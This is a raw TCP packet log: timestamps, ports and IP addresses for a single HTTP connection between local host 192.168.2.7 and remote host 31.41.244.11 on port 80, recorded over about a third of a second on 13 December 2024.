Dec 13, 2024 18:53:30.878232002 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.878329992 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.878386974 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.878388882 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.878443956 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.879920006 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.879987001 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.880036116 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.880093098 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.880470991 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.880532980 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.880620003 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.880687952 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.882483959 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.882535934 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.882546902 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.882591963 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.882952929 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.883012056 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.883059025 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.883116961 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.884783983 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.884849072 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.885015965 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.885075092 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.885329008 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.885387897 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.885459900 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.885519028 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.887418985 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.887473106 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.887481928 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.887530088 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.986464024 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.986490965 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.986510038 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.986643076 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.986677885 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.986677885 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.986745119 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.986759901 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.986767054 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.986805916 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.986828089 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.987437010 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.987504959 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.987566948 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.987632036 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.987813950 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.987878084 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.987915993 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.987952948 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.987974882 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.988018990 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.988758087 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.988823891 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.988826036 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.988862991 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.988898993 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.988919973 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.989450932 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.989521980 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.989574909 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.989610910 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.989655018 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.989687920 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.990253925 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.990320921 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.990389109 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.990423918 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.990438938 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.990505934 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.991096973 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.991166115 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.991228104 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.991264105 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.991291046 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.991312027 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.991986990 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.992058039 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.992079973 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.992116928 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.992146969 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.992166042 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.992739916 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.992801905 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.992842913 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.992880106 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.992908955 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.992935896 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.993570089 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.993635893 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.993699074 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.993735075 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.993757010 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.993788004 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.994313002 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.994373083 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.994440079 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.994488001 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.994496107 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.994543076 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.995155096 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.995219946 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.995310068 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.995362997 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.995378971 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.995415926 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.996011972 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.996073008 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.996139050 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.996191025 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.996216059 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.996275902 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.996767998 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.996825933 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.996886015 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.996922016 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.996942997 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.996975899 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.997608900 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.997674942 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.997699976 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.997709990 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.997754097 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.997786999 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.998373032 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.998445988 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.998512030 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.998548031 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.998577118 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.998897076 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.999099016 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.999177933 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.999253988 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.999291897 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.999314070 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.999366999 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:30.999931097 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:30.999994040 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.000068903 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.000107050 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.000171900 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.000700951 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.000765085 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.000807047 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.000850916 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.000866890 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.000890970 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.001425028 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.001491070 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.001565933 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.001602888 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.001621008 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.001662016 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.002207994 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.002283096 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.002315044 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.002351999 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.002371073 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.002403975 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.002952099 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.003007889 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.003169060 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.003206015 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.003231049 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.003257036 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.003731012 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.003787994 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.003870010 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.003884077 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.003922939 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.003958941 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.004499912 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.004563093 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.004697084 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.004760027 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.004849911 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.004885912 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.004914045 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.004945040 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.005497932 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.005565882 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.005610943 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.005645990 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.005676985 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.005695105 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.006382942 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.006442070 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.006515980 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.006555080 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.006572008 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.006608963 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.006985903 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.007041931 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.007114887 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.007152081 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.007189989 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.007215023 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.007742882 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.007802963 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.007917881 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.007966995 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.008035898 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.008563995 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.008622885 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.008712053 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.008749008 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.008775949 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.008807898 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.009247065 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.009308100 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.009372950 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.009408951 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.009435892 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.009462118 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.010025024 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.010087013 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.010178089 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.010215998 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.010238886 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.010272026 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.010677099 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.010736942 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.010801077 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.010837078 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.010853052 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.010890007 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.011445999 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.011521101 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.011548996 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.011591911 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.029561043 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.029614925 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.029649019 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.029654026 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.029678106 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.029699087 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.029712915 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.029751062 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.029767036 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.029789925 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.029800892 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.029844999 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.030287981 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.030343056 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.030349970 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.030386925 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.178248882 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.178332090 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.178373098 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.178379059 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.178400993 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.178442001 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.178539038 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.178550959 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.178589106 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.178622961 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.179167032 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.179270983 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.179337025 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.179471016 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.179742098 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.179796934 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.179814100 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.179864883 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.179987907 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.180474043 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.180522919 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.180552006 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.180567026 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.180615902 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.181226969 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.181291103 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.181361914 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.181374073 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.181413889 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.181976080 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.182107925 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.182120085 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.182158947 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.182178974 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.182694912 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.182775021 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.182874918 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.182929993 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.182930946 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.182982922 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.183465958 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.183521032 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.183522940 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.183559895 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.183582067 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.183614969 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.184176922 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.184283018 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.184284925 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.184319019 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.184336901 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.184365988 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.184917927 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.184977055 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.185044050 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.185080051 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.185097933 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.185127020 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.185656071 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.185709000 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.185761929 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.185796976 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.185815096 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.185842037 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.186377048 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.186526060 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.186562061 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.186582088 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.186615944 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.187109947 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.187225103 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.187258959 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.187282085 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.187303066 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.187901020 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.187952995 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.188009024 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.188087940 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.188616991 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.188672066 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.188750029 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.188785076 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.188802004 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.188834906 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.189364910 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.189491034 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.189526081 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.189544916 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.189575911 CET	49864	80	192.168.2.7	31.41.244.11
Dec 13, 2024 18:53:31.190093994 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.190222025 CET	80	49864	31.41.244.11	192.168.2.7
Dec 13, 2024 18:53:31.190258026 CET	80	49864	31.41.244.11	192.168.2.7
